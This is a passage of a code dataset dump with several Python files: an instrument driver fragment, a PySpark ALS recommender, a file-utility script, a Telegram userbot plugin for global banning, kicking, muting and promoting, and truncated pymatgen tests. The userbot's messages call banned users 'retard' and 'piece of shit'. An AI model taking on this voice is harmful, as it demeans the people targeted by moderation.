self.ask('READ?')\n\t\t\t# The output returns a 5 number string, first number is voltage, second is current, third is res\n\t\t\treturn float(outString.split(',')[0])\n\t\telse:\n\t\t\treturn 
-999\n\t\t\n\t@property\n\t@quantity_wrapped('A')\n\tdef currentIn(self):\n\t\tif self.currOutputState:\n\t\t\toutString = self.ask('READ?')\n\t\t\treturn float(outString.split(',')[1])\n\t\telse:\n\t\t\treturn -999\n\t\t\n\t@property\n\t@quantity_wrapped('V')\n\tdef voltageOut(self):\n\t\tif self.currOutputState:\n\t\t\treturn float(self.ask('SOUR:VOLT?'))\n\t\telse:\n\t\t\treturn self.currentOutputVoltage\n\n\t@voltageOut.setter\n\t@quantity_unwrapped('V')\n\tdef voltageOut(self,value):\n\t\tself.write('SOUR:FUNC VOLT')\n\t\tself.write('SOUR:VOLT:LEV {0}'.format(value))\n\t\tself.currentOutputVoltage = value\n\t\t\n\t@property\n\t@quantity_wrapped('A')\n\tdef currentOut(self):\n\t\tif self.currOutputState:\n\t\t\treturn float(self.ask('SOUR:CURR?'))\n\t\telse:\n\t\t\treturn self.currentOutputCurrent\n\t\n\t@currentOut.setter\n\t@quantity_unwrapped('A')\n\tdef currentOut(self,value):\n\t\t#self.write('SOUR:FUNC CURR')\n\t\tself.write('SOUR:CURR:LEV {0}'.format(value))\n\t\tself.currentOutputCurrent = value\n\n\nname = 'sourceMeter 2401'\nimplementation = sm2401\n","sub_path":"spacq/devices/keithley/sourceMeter2401.py","file_name":"sourceMeter2401.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478718870","text":"# Import the required libraries\nimport numpy as np\nimport pandas as pd\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.recommendation import ALS\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.mllib.evaluation import RegressionMetrics, RankingMetrics\nimport pyspark.sql.functions as func\nfrom pyspark.sql.functions import round, col, expr\nfrom pyspark import SparkContext\n\nspark = SparkSession.builder.appName(\"My_Session\").getOrCreate()\n\n# SparkContext.setSystemProperty('spark.executor.memory', '8g')\n# sc = SparkContext(\"local\", \"App Name\")\n# sc._conf.getAll()\n\n# Load the training, validation and test sets\ntrain = spark.read.parquet('training_set.parquet')\ntrain = train.select(train['user_id'], train['book_id'], train['rating'])\n\nval = spark.read.parquet('validation_set.parquet')\nval = val.select(val['user_id'], val['book_id'], val['rating'])\n\ntest = spark.read.parquet('test_set.parquet')\ntest = test.select(test['user_id'], test['book_id'], test['rating'])\n\n# See some statistics about the train, validation and test data\nprint('Statistics for Training Data: ')\ntrain.describe().show()\nprint('Statistics for Validation Data: ')\nval.describe().show()\nprint('Statistics for Test Data: ')\ntest.describe().show()\n\n# Hyperparameter Tuning\nfor l in np.arange(0.05,0.15,0.01):\n for r in np.arange(10,100,10):\n\n # Create ALS Model\n als = ALS(rank=r,regParam=l,userCol = 'user_id', itemCol = 'book_id', ratingCol = 'rating', coldStartStrategy = 'drop', nonnegative = True)\n\n # Train the model\n model = als.fit(train)\n\n evaluator = RegressionEvaluator(metricName = 'rmse', labelCol = 'rating', predictionCol = 'prediction')\n\n predictions = model.transform(val)\n rmse = evaluator.evaluate(predictions)\n #predictions.show()\n\n predictions1 = model.transform(test)\n rmse1 = evaluator.evaluate(predictions1)\n print('Rank: {} \\tLambda: {:.6f} \\tRMSE Validation: {:.6f} \\tTest Loss: {:.6f}'.format(\n r,\n l,\n rmse,\n rmse1\n ))\n\n# After doing the hyperparameter tuning, ideal values for rank and regParam are: rank = 50 and regParam = 0.09\nr = 50\nl = 0.09\nals = ALS(rank = r, regParam = l, userCol = 'user_id', itemCol = 'book_id', 
ratingCol = 'rating', coldStartStrategy = 'drop', nonnegative = True)\n\n# Train the model\nmodel = als.fit(train)\n\n# RMSE value evalutation (Regression Metric)\nevaluator = RegressionEvaluator(metricName = 'rmse', labelCol = 'rating', predictionCol = 'prediction')\n\n# Prediction of rating for validation set\npredictions = model.transform(val)\npredictions = predictions.withColumn(\"prediction\", func.round(predictions[\"prediction\"]))\nrmse = evaluator.evaluate(predictions)\n#predictions.show()\n\n# Prediction of rating for test set\npredictions1 = model.transform(test)\npredictions1 = predictions1.withColumn(\"prediction\", func.round(predictions1[\"prediction\"]))\nrmse1 = evaluator.evaluate(predictions1)\nprint('Rank: {} \\tLambda: {:.6f} \\tRMSE Validation: {:.6f} \\tTest Loss: {:.6f}'.format(\n r,\n l,\n rmse,\n rmse1\n ))\n\nprint('Predictions of Ratings on the Validation Data: ')\npredictions.show()\nprint('Schema for validation set predictions: ')\npredictions.printSchema() \n\nprint('Predictions of Ratings on the Test Data: ')\npredictions1.show()\nprint('Schema for test set predictions: ')\npredictions1.printSchema()\n\n# Recommend books for all users\nuser_recs = model.recommendForAllUsers(500)\n\n# user_recs = user_recs.withColumn(\"recommendations.rating\", func.round(user_recs[\"recommendations.rating\"]))\n\nprint('Top 500 Recommendations for each user: ')\nuser_recs1 = model.recommendForAllUsers(500).selectExpr('user_id', 'explode(recommendations)').show()\nuser_recs1 = model.recommendForAllUsers(500).selectExpr('user_id', 'explode(recommendations)')\n\n# Ordering the recommendations by user_id\nuser_recs1.createOrReplaceTempView('user_recs1')\ndisplay = spark.sql('SELECT * FROM user_recs1 ORDER BY user_id')\nprint('After being ordered by user_id: ')\ndisplay.show(50)\n\n# The recommendations for a particular user\nuser = 22000\nprint('Recommendations for user_id', user, 'is: ')\ndisplay = spark.sql('''SELECT * FROM user_recs1 WHERE user_id = 22000''')\ndisplay.show()\nprint(type(user_recs))\nprint(user_recs.printSchema())\n\n# actual_val = val.groupBy(\"user_id\").agg(expr(\"collect_set(book_id) as books\"))\n# pred_val = user_recs.select('user_id','recommendations.book_id')\n# output_val = pred_val.join(actual_val,['user_id']).select('book_id','books')\n# metrics_val = RankingMetrics(output_val.rdd)\n# result_val = metrics_val.meanAveragePrecision\n# print('The MAP is:', result_val)\n\n# Mean Average Precision (Ranking Metric)\nactual_test = test.groupBy(\"user_id\").agg(expr(\"collect_set(book_id) as books\"))\npred_val = user_recs.select('user_id','recommendations.book_id')\noutput_test = pred_val.join(actual_test,['user_id']).select('book_id','books')\nmetrics_test = RankingMetrics(output_test.rdd)\nresult_test = metrics_test.meanAveragePrecision\nprint('The MAP is:', result_test)\n\n# print('Training Set: ')\n# train.show()\n# print(train.count())\n\n# print('Validation Set: ')\n# val.show()\n# print(val.count())\n\n# print('Test Set: ')\n# test.show()\n# print(test.count())","sub_path":"als_implementation.py","file_name":"als_implementation.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"80430051","text":"import os\r\nimport subprocess\r\n\r\ndef killprocbyname(s):\r\n import psutil\r\n \r\n # 2. 
if junk is running, kill it\r\n for proc in psutil.process_iter():\r\n # check whether the process name matches\r\n if proc.name() == s:\r\n print('it\\'s running!')\r\n proc.kill()\r\n \r\ndef catfiles(filelist):\r\n with open('catfile.txt', 'w') as outfile:\r\n for i in filelist:\r\n with open(i, 'r') as infile:\r\n for line in infile:\r\n outfile.write(line)\r\n with open('catfile.txt', 'r') as catfile:\r\n for line in catfile:\r\n print(line)\r\n \r\ndef compare_files(f1, f2):\r\n cmd = str('fc {} {}'.format(f1, f2))\r\n ret = subprocess.getoutput(cmd)\r\n if (ret.endswith('no differences encountered\\n')):\r\n print('matching files!!!!')\r\n return True\r\n return False\r\n \r\n\r\nif __name__ == '__main__':\r\n textfiles = []\r\n print(os.getcwd())\r\n\r\n # 1. List all .txt files\r\n ret = os.listdir()\r\n for i in ret:\r\n #check i ends with '.txt'\r\n if i.endswith('.txt'):\r\n textfiles.append(i)\r\n print(textfiles)\r\n \r\n #ccompare files!\r\n print(compare_files(textfiles[0], textfiles[1]))\r\n \r\n killprocbyname('junk.exe')\r\n \r\n catfiles(textfiles)\r\n\r\n ","sub_path":"TestP3Port/osBIT.py","file_name":"osBIT.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"14719432","text":"import asyncio\n\nfrom telethon import events\nfrom telethon.tl.functions.channels import EditAdminRequest\nfrom telethon.tl.types import ChatAdminRights, MessageEntityMentionName\n\nfrom sql import gmute_sql as gsql\nfrom sql.gban_sql import all_gbanned, gbaner, is_gbanned, ungbaner\n\nfrom . import *\n\n\n@Andencento.on(sudo_cmd(pattern=r\"gban ?(.*)\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(allow_sudo=True, pattern=r\"ungmute ?(\\d+)?\"))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(pattern=\"listgban$\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(pattern=r\"ungban ?(.*)\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(pattern=r\"gkick ?(.*)\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(allow_sudo=True, pattern=r\"gmute ?(\\d+)?\"))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(andencento_cmd(pattern=r\"gban ?(.*)\"))\nasync def _(event):\n user = await eor(event, \"`Gbanning this retard`\")\n reason = \"\"\n if event.reply_to_msg_id:\n userid = (await event.get_reply_message()).sender_id\n try:\n reason = event.text.split(\" \", maxsplit=1)[1]\n except IndexError:\n reason = \"\"\n elif event.pattern_match.group(1):\n usr = event.text.split(\" \", maxsplit=2)[1]\n userid = await get_user_id(usr)\n try:\n reason = event.text.split(\" \", maxsplit=2)[2]\n except IndexError:\n reason = \"\"\n elif event.is_private:\n userid = (await event.get_chat()).id\n try:\n reason = event.text.split(\" \", maxsplit=1)[1]\n except IndexError:\n reason = \"\"\n else:\n return await eod(\n user, \"**To gban a user i need a userid or reply to his/her message!!**\"\n )\n name = (await event.client.get_entity(userid)).first_name\n chats = 0\n if userid == ForGo10God:\n return await 
eod(user, \"🥴 **Nashe me hai kya ‽**\")\n if str(userid) in DEVLIST:\n return await eod(\n user,\n \"😑 **Hey Son Dont gban your father ?¿ K‽**\",\n )\n if is_gbanned(userid):\n return await eod(\n user,\n \"This kid is already gbanned and added to my **Gban Watch!!**\",\n )\n async for gfuck in event.client.iter_dialogs():\n if gfuck.is_group or gfuck.is_channel:\n try:\n await event.client.edit_permissions(\n gfuck.id, userid, view_messages=False\n )\n chats += 1\n except BaseException:\n pass\n gbaner(userid)\n gmsg = f\"🥴 [{name}](tg://user?id={userid}) **Is now GBanned by** {user_mention} **in** `{chats}` **Gbanned this retard**\\n\\n📍 Also Added to Gban Watch!!**!\\n**🔰 Total Chats :** `{chats}`\"\n if reason != \"\":\n gmsg += f\"\\n**🔰 Reason :** `{reason}`\"\n ogmsg = f\"[{name}](tg://user?id={userid}) **Is now GBanned by** {user_mention} **in** `{chats}` **Gbanned this user**\\n\\n**📍 Also Added to Gban Watch!!**!\\n**🔰 Total Chats :** `{chats}`\"\n if reason != \"\":\n ogmsg += f\"\\n**🔰 Reason :** `{reason}`\"\n if Config.ABUSE == \"ON\":\n await user.edit(ogmsg)\n else:\n await user.edit(ogmsg)\n\n\n@Andencento.on(andencento_cmd(pattern=r\"ungban ?(.*)\"))\nasync def _(event):\n user = await eor(event, \"`Ungban in progress...`\")\n if event.reply_to_msg_id:\n userid = (await event.get_reply_message()).sender_id\n elif event.pattern_match.group(1):\n userid = await get_user_id(event.pattern_match.group(1))\n elif event.is_private:\n userid = (await event.get_chat()).id\n else:\n return await eod(user, \"`Reply to a user or give their userid... `\")\n name = (await event.client.get_entity(userid)).first_name\n chats = 0\n if not is_gbanned(userid):\n return await eod(user, \"`User is not gbanned.`\")\n async for gfuck in event.client.iter_dialogs():\n if gfuck.is_group or gfuck.is_channel:\n try:\n await event.client.edit_permissions(\n gfuck.id, userid, view_messages=True\n )\n chats += 1\n except BaseException:\n pass\n ungbaner(userid)\n await user.edit(\n f\"📍 [{name}](tg://user?id={userid}) **is now Ungbanned from `{chats}` chats and removed from Gban Watch!! 
Agli bar se backchodi na karna**\",\n )\n\n\n@Andencento.on(andencento_cmd(pattern=\"listgban$\"))\nasync def already(event):\n gbanned_users = all_gbanned()\n GBANNED_LIST = \"**Gbanned Users :**\\n\"\n if len(gbanned_users) > 0:\n for user in gbanned_users:\n name = (await bot.get_entity(int(user))).first_name\n GBANNED_LIST += f\"📍 [{name}](tg://user?id={user.chat_id})\\n\"\n else:\n GBANNED_LIST = \"No Gbanned Users!!\"\n await edit_or_reply(event, GBANNED_LIST)\n\n\n@Andencento.on(events.ChatAction)\nasync def _(event):\n if event.user_joined or event.added_by:\n user = await event.get_user()\n chat = await event.get_chat()\n if is_gbanned(str(user.id)):\n if chat.admin_rights:\n try:\n await event.client.edit_permissions(\n chat.id,\n user.id,\n view_messages=False,\n )\n gban_watcher = f\"⚠️⚠️**Warning**⚠️⚠️\\n\\n`Gbanned User Joined the chat!!`\\n**⚜️ Retard Id :** [{user.first_name}](tg://user?id={user.id})\\n\"\n gban_watcher += (\n f\"**🔥 Action 🔥** \\n`Banned this piece of shit....` **AGAIN!**\"\n )\n await event.reply(gban_watcher)\n except BaseException:\n pass\n\n\n@Andencento.on(andencento_cmd(pattern=r\"gkick ?(.*)\"))\nasync def gkick(event):\n user = await eor(event, \"`Kicking globally...`\")\n if event.reply_to_msg_id:\n userid = (await event.get_reply_message()).sender_id\n elif event.pattern_match.group(1):\n userid = await get_user_id(event.pattern_match.group(1))\n elif event.is_private:\n userid = (await event.get_chat()).id\n else:\n return await eod(user, \"`Reply to some msg or add their id.`\")\n name = (await event.client.get_entity(userid)).first_name\n chats = 0\n if userid == ForGo10God:\n return await eod(user, \"**🥴 Nashe me hai kya !!**\")\n if str(userid) in DEVLIST:\n return await eod(user, \"**😪 I'm not going to gkick my developer!!**\")\n async for gkick in event.client.iter_dialogs():\n if gkick.is_group or gkick.is_channel:\n try:\n await bot.kick_participant(gkick.id, userid)\n chats += 1\n except BaseException:\n pass\n gkmsg = f\"🏃 **Globally Kicked** [{name}](tg://user?id={userid})'s butts !! \\n\\n📝 **Chats :** `{chats}`\"\n if Config.ABUSE == \"ON\":\n await user.edit(gkmsg)\n else:\n await user.edit(gkmsg)\n\n\n@Andencento.on(andencento_cmd(pattern=r\"gmute ?(\\d+)?\"))\nasync def gm(event):\n private = False\n if event.fwd_from:\n return\n elif event.is_private:\n await eor(event, \"`Trying to gmute user...`\")\n await asyncio.sleep(2)\n private = True\n reply = await event.get_reply_message()\n if event.pattern_match.group(1) is not None:\n userid = event.pattern_match.group(1)\n elif reply is not None:\n userid = reply.sender_id\n elif private is True:\n userid = event.chat_id\n else:\n return await eod(\n event, \"Need a user to gmute. Reply or give userid to gmute them..\"\n )\n event.chat_id\n await event.get_chat()\n if gsql.is_gmuted(userid, \"gmute\"):\n return await eod(event, \"This kid is already Gmuted.\")\n try:\n if str(userid) in DEVLIST:\n return await eod(event, \"**Sorry I'm not going to gmute them..**\")\n except BaseException:\n return\n try:\n gsql.gmute(userid, \"gmute\")\n except Exception as e:\n await eod(event, \"Error occured!\\nError is \" + str(e))\n else:\n await eor(event, \"Shhh.... 
Now keep quiet !!\")\n\n\n@Andencento.on(andencento_cmd(outgoing=True, pattern=r\"ungmute ?(\\d+)?\"))\nasync def endgmute(event):\n private = False\n if event.fwd_from:\n return\n elif event.is_private:\n await eor(event, \"`Trying to ungmute !!`\")\n await asyncio.sleep(2)\n private = True\n reply = await event.get_reply_message()\n if event.pattern_match.group(1) is not None:\n userid = event.pattern_match.group(1)\n elif reply is not None:\n userid = reply.sender_id\n elif private is True:\n userid = event.chat_id\n else:\n return await eod(\n event,\n \"Please reply to a user or add their into the command to ungmute them.\",\n )\n event.chat_id\n if not gsql.is_gmuted(userid, \"gmute\"):\n return await eod(event, \"I don't remember I gmuted him...\")\n try:\n gsql.ungmute(userid, \"gmute\")\n except Exception as e:\n await eod(event, \"Error occured!\\nError is \" + str(e))\n else:\n await eor(event, \"Ok!! Speak\")\n\n\nmarculs = 9\n\n\nasync def get_full_user(event):\n args = event.pattern_match.group(1).split(\":\", 1)\n extra = None\n if event.reply_to_msg_id and not len(args) == 2:\n previous_message = await event.get_reply_message()\n user_obj = await event.client.get_entity(previous_message.sender_id)\n extra = event.pattern_match.group(1)\n elif len(args[0]) > 0:\n user = args[0]\n if len(args) == 2:\n extra = args[1]\n if user.isnumeric():\n user = int(user)\n if not user:\n await event.edit(\"`Itz not possible without an user ID`\")\n return\n if event.message.entities is not None:\n probable_user_mention_entity = event.message.entities[0]\n if isinstance(probable_user_mention_entity, MessageEntityMentionName):\n user_id = probable_user_mention_entity.user_id\n user_obj = await event.client.get_entity(user_id)\n return user_obj\n try:\n user_obj = await event.client.get_entity(user)\n except Exception as err:\n return await event.edit(\n \"Error... 
Please report at @AndencentoSupport\", str(err)\n )\n return user_obj, extra\n\n\nglobal hawk, moth\nhawk = \"admin\"\nmoth = \"owner\"\n\n\nasync def get_user_from_id(user, event):\n if isinstance(user, str):\n user = int(user)\n try:\n user_obj = await event.client.get_entity(user)\n except (TypeError, ValueError) as err:\n await event.edit(str(err))\n return None\n return user_obj\n\n\n@Andencento.on(andencento_cmd(pattern=\"gpromote ?(.*)\"))\nasync def gben(userbot):\n dc = dark = userbot\n i = 0\n await dc.get_sender()\n me = await userbot.client.get_me()\n await dark.edit(\"`promoting...`\")\n my_mention = \"[{}](tg://user?id={})\".format(me.first_name, me.id)\n f\"@{me.username}\" if me.username else my_mention\n await userbot.get_chat()\n if userbot.is_private:\n user = userbot.chat\n rank = userbot.pattern_match.group(1)\n else:\n userbot.chat.title\n try:\n user, rank = await get_full_user(userbot)\n except BaseException:\n pass\n if me == user:\n await dark.edit(\"U want to promote urself 😑😑 waao..\")\n return\n try:\n if not rank:\n rank = \"ㅤㅤ\"\n except BaseException:\n return await dark.edit(f\"**Something W3NT Wrong 🤔**\")\n if user:\n telchanel = [\n d.entity.id\n for d in await userbot.client.get_dialogs()\n if (d.is_group or d.is_channel)\n ]\n rgt = ChatAdminRights(\n add_admins=False,\n invite_users=True,\n change_info=False,\n ban_users=True,\n delete_messages=True,\n pin_messages=True,\n )\n for x in telchanel:\n try:\n await userbot.client(EditAdminRequest(x, user, rgt, rank))\n i += 1\n await dark.edit(f\"**Promoted in Chats **: `{i}`\")\n except BaseException:\n pass\n else:\n await dark.edit(f\"**Reply to a user you dumbo !!**\")\n return await dark.edit(\n f\"**Globally promoted [{user.first_name}](tg://user?id={user.id})\\n On Chats😏 : {i} **\"\n )\n\n\n@Andencento.on(andencento_cmd(pattern=\"gdemote ?(.*)\"))\nasync def gben(userbot):\n dc = dark = userbot\n i = 0\n await dc.get_sender()\n me = await userbot.client.get_me()\n await dark.edit(\"`demoting...`\")\n my_mention = \"[{}](tg://user?id={})\".format(me.first_name, me.id)\n f\"@{me.username}\" if me.username else my_mention\n await userbot.get_chat()\n if userbot.is_private:\n user = userbot.chat\n rank = userbot.pattern_match.group(1)\n else:\n userbot.chat.title\n try:\n user, rank = await get_full_user(userbot)\n except BaseException:\n pass\n if me == user:\n await dark.edit(\"U want to demote urself 😑😑 waao..\")\n return\n try:\n if not rank:\n rank = \"ㅤㅤ\"\n except BaseException:\n return await dark.edit(f\"**Something W3NT Wrong 🤔**\")\n if user:\n telchanel = [\n d.entity.id\n for d in await userbot.client.get_dialogs()\n if (d.is_group or d.is_channel)\n ]\n rgt = ChatAdminRights(\n add_admins=None,\n invite_users=None,\n change_info=None,\n ban_users=None,\n delete_messages=None,\n pin_messages=None,\n )\n for x in telchanel:\n try:\n await userbot.client(EditAdminRequest(x, user, rgt, rank))\n i += 1\n await dark.edit(f\"**Demoted in Chats **: `{i}`\")\n except BaseException:\n pass\n else:\n await dark.edit(f\"**Reply to a user you dumbo !!**\")\n return await dark.edit(\n f\"**Globally Demoted [{user.first_name}](tg://user?id={user.id})\\n On Chats😏 : {i} **\"\n )\n\n\n@command(incoming=True)\nasync def watcher(event):\n if gsql.is_gmuted(event.sender_id, \"gmute\"):\n await event.delete()\n\n\nCmdHelp(\"global\").add_command(\n \"gban\",\n \"/\",\n \"Globally Bans the mentioned user in 'X' chats you are admin with ban permission.\",\n).add_command(\n \"ungban\", \"/\", \"Globally Unbans 
the user in 'X' chats you are admin!\"\n).add_command(\n \"listgban\", None, \"Gives the list of all GBanned Users.\"\n).add_command(\n \"gkick\", \"/\", \"Globally Kicks the user in 'X' chats you are admin!\"\n).add_command(\n \"gmute\", \" or \", \"Globally Mutes the User.\"\n).add_command(\n \"ungmute\", \" or \", \"Globally Unmutes the gmutes user.\"\n).add_command(\n \"gpromote\", \" or \", \"Globally promotes the User.\"\n).add_command(\n \"ungdemote\", \" or \", \"Globally demotes the gpromoted user.\"\n).add_info(\n \"Global Admin Tool.\"\n).add_warning(\n \"✅ Harmlesss Module.\"\n).add()\n","sub_path":"plugins/global.py","file_name":"global.py","file_ext":"py","file_size_in_byte":15658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232867784","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\nimport unittest\nimport os\nimport json\nimport numpy as np\nimport itertools\n\nfrom pymatgen.analysis.structure_matcher import StructureMatcher, \\\n ElementComparator, FrameworkComparator, OrderDisorderElementComparator, \\\n OccupancyComparator, PointDefectComparator\nfrom pymatgen.analysis.defects.core import Vacancy, Interstitial, \\\n Substitution\nfrom monty.json import MontyDecoder\nfrom pymatgen.core import PeriodicSite\nfrom pymatgen.core.operations import SymmOp\nfrom pymatgen import Structure, Element, Lattice\nfrom pymatgen.util.coord import find_in_coord_list_pbc\nfrom pymatgen.util.testing import PymatgenTest\n\ntest_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\",\n 'test_files')\n\n\nclass StructureMatcherTest(PymatgenTest):\n _multiprocess_shared_ = True\n\n def setUp(self):\n with open(os.path.join(test_dir, \"TiO2_entries.json\"), 'r') as fp:\n entries = json.load(fp, cls=MontyDecoder)\n self.struct_list = [e.structure for e in entries]\n self.oxi_structs = [self.get_structure(\"Li2O\"),\n Structure.from_file(os.path.join(\n test_dir, \"POSCAR.Li2O\"))]\n\n def test_ignore_species(self):\n s1 = Structure.from_file(os.path.join(test_dir, \"LiFePO4.cif\"))\n s2 = Structure.from_file(os.path.join(test_dir, \"POSCAR\"))\n m = StructureMatcher(ignored_species=[\"Li\"], primitive_cell=False,\n attempt_supercell=True)\n self.assertTrue(m.fit(s1, s2))\n self.assertTrue(m.fit_anonymous(s1, s2))\n groups = m.group_structures([s1, s2])\n self.assertEqual(len(groups), 1)\n s2.make_supercell((2, 1, 1))\n ss1 = m.get_s2_like_s1(s2, s1, include_ignored_species=True)\n self.assertAlmostEqual(ss1.lattice.a, 20.820740000000001)\n self.assertEqual(ss1.composition.reduced_formula, \"LiFePO4\")\n\n self.assertEqual({\n k.symbol: v.symbol for k, v in\n m.get_best_electronegativity_anonymous_mapping(s1, s2).items()},\n {\"Fe\": \"Fe\", \"P\": \"P\", \"O\": \"O\"})\n\n def test_get_supercell_size(self):\n l = Lattice.cubic(1)\n l2 = Lattice.cubic(0.9)\n s1 = Structure(l, ['Mg', 'Cu', 'Ag', 'Cu', 'Ag'], [[0] * 3] * 5)\n s2 = Structure(l2, ['Cu', 'Cu', 'Ag'], [[0] * 3] * 3)\n\n sm = StructureMatcher(supercell_size='volume')\n self.assertEqual(sm._get_supercell_size(s1, s2),\n (1, True))\n self.assertEqual(sm._get_supercell_size(s2, s1),\n (1, True))\n\n sm = StructureMatcher(supercell_size='num_sites')\n self.assertEqual(sm._get_supercell_size(s1, s2),\n (2, False))\n self.assertEqual(sm._get_supercell_size(s2, s1),\n (2, True))\n\n sm = StructureMatcher(supercell_size='Ag')\n self.assertEqual(sm._get_supercell_size(s1, s2),\n (2, False))\n 
self.assertEqual(sm._get_supercell_size(s2, s1),\n (2, True))\n\n sm = StructureMatcher(supercell_size='wfieoh')\n self.assertRaises(ValueError, sm._get_supercell_size, s1, s2)\n\n def test_cmp_fstruct(self):\n sm = StructureMatcher()\n\n s1 = np.array([[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]])\n s2 = np.array([[0.11, 0.22, 0.33]])\n frac_tol = np.array([0.02, 0.03, 0.04])\n mask = np.array([[False, False]])\n mask2 = np.array([[True, False]])\n\n self.assertRaises(ValueError, sm._cmp_fstruct, s2, s1, frac_tol, mask.T)\n self.assertRaises(ValueError, sm._cmp_fstruct, s1, s2, frac_tol, mask.T)\n\n self.assertTrue(sm._cmp_fstruct(s1, s2, frac_tol, mask))\n self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol / 2, mask))\n self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol, mask2))\n\n def test_cart_dists(self):\n sm = StructureMatcher()\n l = Lattice.orthorhombic(1, 2, 3)\n\n s1 = np.array([[0.13, 0.25, 0.37], [0.1, 0.2, 0.3]])\n s2 = np.array([[0.11, 0.22, 0.33]])\n s3 = np.array([[0.1, 0.2, 0.3], [0.11, 0.2, 0.3]])\n s4 = np.array([[0.1, 0.2, 0.3], [0.1, 0.6, 0.7]])\n mask = np.array([[False, False]])\n mask2 = np.array([[False, True]])\n mask3 = np.array([[False, False], [False, False]])\n mask4 = np.array([[False, True], [False, True]])\n\n n1 = (len(s1) / l.volume) ** (1 / 3)\n n2 = (len(s2) / l.volume) ** (1 / 3)\n\n self.assertRaises(ValueError, sm._cart_dists, s2, s1, l, mask.T, n2)\n self.assertRaises(ValueError, sm._cart_dists, s1, s2, l, mask.T, n1)\n\n d, ft, s = sm._cart_dists(s1, s2, l, mask, n1)\n self.assertTrue(np.allclose(d, [0]))\n self.assertTrue(np.allclose(ft, [-0.01, -0.02, -0.03]))\n self.assertTrue(np.allclose(s, [1]))\n\n # check that masking best value works\n d, ft, s = sm._cart_dists(s1, s2, l, mask2, n1)\n self.assertTrue(np.allclose(d, [0]))\n self.assertTrue(np.allclose(ft, [0.02, 0.03, 0.04]))\n self.assertTrue(np.allclose(s, [0]))\n\n # check that averaging of translation is done properly\n d, ft, s = sm._cart_dists(s1, s3, l, mask3, n1)\n self.assertTrue(np.allclose(d, [0.08093341] * 2))\n self.assertTrue(np.allclose(ft, [0.01, 0.025, 0.035]))\n self.assertTrue(np.allclose(s, [1, 0]))\n\n # check distances are large when mask allows no 'real' mapping\n d, ft, s = sm._cart_dists(s1, s4, l, mask4, n1)\n self.assertTrue(np.min(d) > 1e8)\n self.assertTrue(np.min(ft) > 1e8)\n\n def test_get_mask(self):\n sm = StructureMatcher(comparator=ElementComparator())\n l = Lattice.cubic(1)\n s1 = Structure(l, ['Mg', 'Cu', 'Ag', 'Cu'], [[0] * 3] * 4)\n s2 = Structure(l, ['Cu', 'Cu', 'Ag'], [[0] * 3] * 3)\n\n result = [[True, False, True, False],\n [True, False, True, False],\n [True, True, False, True]]\n m, inds, i = sm._get_mask(s1, s2, 1, True)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 2)\n self.assertEqual(inds, [2])\n\n # test supercell with match\n result = [[1, 1, 0, 0, 1, 1, 0, 0],\n [1, 1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 0, 0, 1, 1]]\n m, inds, i = sm._get_mask(s1, s2, 2, True)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 2)\n self.assertTrue(np.allclose(inds, np.array([4])))\n\n # test supercell without match\n result = [[1, 1, 1, 1, 1, 1],\n [0, 0, 0, 0, 1, 1],\n [1, 1, 1, 1, 0, 0],\n [0, 0, 0, 0, 1, 1]]\n m, inds, i = sm._get_mask(s2, s1, 2, True)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 0)\n self.assertTrue(np.allclose(inds, np.array([])))\n\n # test s2_supercell\n result = [[1, 1, 1], [1, 1, 1],\n [0, 0, 1], [0, 0, 1],\n [1, 1, 0], [1, 1, 0],\n [0, 0, 1], [0, 0, 1]]\n m, inds, i = sm._get_mask(s2, s1, 2, 
False)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 0)\n self.assertTrue(np.allclose(inds, np.array([])))\n\n # test for multiple translation indices\n s1 = Structure(l, ['Cu', 'Ag', 'Cu', 'Ag', 'Ag'], [[0] * 3] * 5)\n s2 = Structure(l, ['Ag', 'Cu', 'Ag'], [[0] * 3] * 3)\n result = [[1, 0, 1, 0, 0],\n [0, 1, 0, 1, 1],\n [1, 0, 1, 0, 0]]\n m, inds, i = sm._get_mask(s1, s2, 1, True)\n\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 1)\n self.assertTrue(np.allclose(inds, [0, 2]))\n\n def test_get_supercells(self):\n sm = StructureMatcher(comparator=ElementComparator())\n l = Lattice.cubic(1)\n l2 = Lattice.cubic(0.5)\n s1 = Structure(l, ['Mg', 'Cu', 'Ag', 'Cu'], [[0] * 3] * 4)\n s2 = Structure(l2, ['Cu', 'Cu', 'Ag'], [[0] * 3] * 3)\n scs = list(sm._get_supercells(s1, s2, 8, False))\n for x in scs:\n self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)\n self.assertEqual(len(x[0]), 4)\n self.assertEqual(len(x[1]), 24)\n self.assertEqual(len(scs), 48)\n\n scs = 